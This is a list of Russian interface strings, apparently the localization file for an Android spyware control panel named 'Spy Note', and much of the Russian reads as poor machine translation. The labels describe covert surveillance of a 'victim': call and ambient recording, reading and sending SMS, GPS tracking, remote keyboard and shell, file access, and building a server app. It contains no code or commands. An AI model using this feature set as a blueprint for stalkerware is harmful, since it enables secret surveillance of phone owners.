-------------- RUS ---------------
порт
Порт:> 1023
открытый порт
выход
Поле только принимает только цифры
Вы не можете использовать порт меньше, чем 1023, если вы не корень!
Запись вызовов
Установленные приложения
информация об устройстве
Удаленная клавиатура
Fun Panel
Система глобального позиционирования (GPS)
Прослушивание телефона окружение
Читать SMS-сообщения
Удаленные команды
Файловый менеджер
Адресная книга
Список WiFi
буфер обмена
Process Manager
Отправить SMS
Download Manager
уведомления управления
Фон экрана
Обнаружить Faces (Samsung)
Запись разговоров
рекордер экрана
IMEI
IP
CAM
V-ANDROID
МОДЕЛЬ
СТРАНА
N.VERSION
ПРОИЗВОДИТЕЛЬ
СЕРИЙНЫЙ
USER
скачать
Загрузить
Бревна жертв
Командная оболочка
производительность
Перезагрузка клиента
Удаление Offline
все
онлайн
коробка
сервер
копия
Перезагрузка сервера
Удаление
инструменты
помощь
Загрузки Box
строить
настройки
О Spy Примечание
ТБ
гигабайт
мегабайт
KB
В
Ln
Добавить файл
Введите имя файла
Новая папка
добавлять
имя
Имя пакета
открытый
играть в Google
Удаление
имя
Номер телефона
Добавить Имя
Удалить название
обновление
Разрешение экрана:
обновление
Показать Контакты
номер телефона
Тип вызова
Название \ Его время
время
копия
послать
Снимок экрана
остановить
ссылка
Путь и новую папку
название
описание
имя папки
Имя файла
ошибка
Я послал
IMEI
имя файла
размер
путь к файлу
открыть с помощью
удалять
Удалить все
открыть файл
браузер
Не удалось найти файл
Не удалось обнаружить лица
Распознавание лиц
имя
размер
файл
скачать
открыт
переименовать
удалять
обновление
Новый файл
чтение
папка
еще
Это не каталог:
Невозможно загрузить эту папку
Файл с таким именем уже существует, вы хотите заменить?
чтение>
text.txt
Новая папка
Координаты сайта жертвы:
Расположение:
REC
остановить
играть
Сохранить
Нет файлов
запись
Остановить запись, пожалуйста, подождите ...
Играть ...
Успешно закончить
Неопределенный
Остановился
Приостановлена
Воспроизведение
сканирование вперед
ScanReverse
Буферизация
ожидание
MediaEnded
Переход
готовый
Reconnecting
последний
Не известна Состояние:
Пожалуйста, подождите ...
послать
классический
черный
окно оповещения
URL
бесшумный ход
Мелодии
Режимы
уведомление
система
Загрузить настройки ...
обновление
Встряска
Таймер:
сообщение
Открыть URL
Телефон Бар
Звуки и уведомления
тремоло
Кнопка Отключить выход
Добавление контакта
Введите имя
Введите номер
добавлять
получить уведомление
Удаление
подключить
О системе
<Батарея
имя
PACKAGENAME
система упаковки
размер
убить
обновление
Сохранить
переименовывать
переименовать
renamee
Вызовы регистрируются
размер
Запустить функцию записи
Остановить функцию записи
Текст сообщения
номер телефона
послать
Пожалуйста, подождите ...
копия
вырезать
клейстер
SelectAll
расстегивать
хорошо
браузер
Уведомление о сервере входа
Звуковое оповещение, когда вы получаете новый клиент
добавлять
язык
Сохранить
Панель управления
Ln
Ln
Ln
Имя:
?
Не удалось найти файл
Ln
Ln
Копирование:
Ln
Нет активации собственности
Ln
Загрузки Box>
?
Имя:
Ln
Вы хотите, чтобы открыть эту ссылку
Ln
копия
вырезать
клейстер
SelectAll
расстегивать
чистый
ApplicationName:
Ведущий:
Порт:
ServerName:
versionName:
значок
строить
Сборка>
Сборка сервера
Поле принимает только цифры
вид
детали
список
Blook
Черный список
Отправить черный список
Black_list
Сохранить
найти
Копирование файлов
Просмотреть все
близко
Развернутое
Минимизация
Восстановление вниз
ЗАГРУЗКИ
DCIM
RINGTONES
КИНО
КАРТИНЫ
МУЗЫКА
УВЕДОМЛЕНИЯ
ПОДКАСТИНГ
REMOVED
ДОКУМЕНТЫ
обновление
скачать
удалять
Сохранить
копия
копия
вырезать
клейстер
SelectAll
расстегивать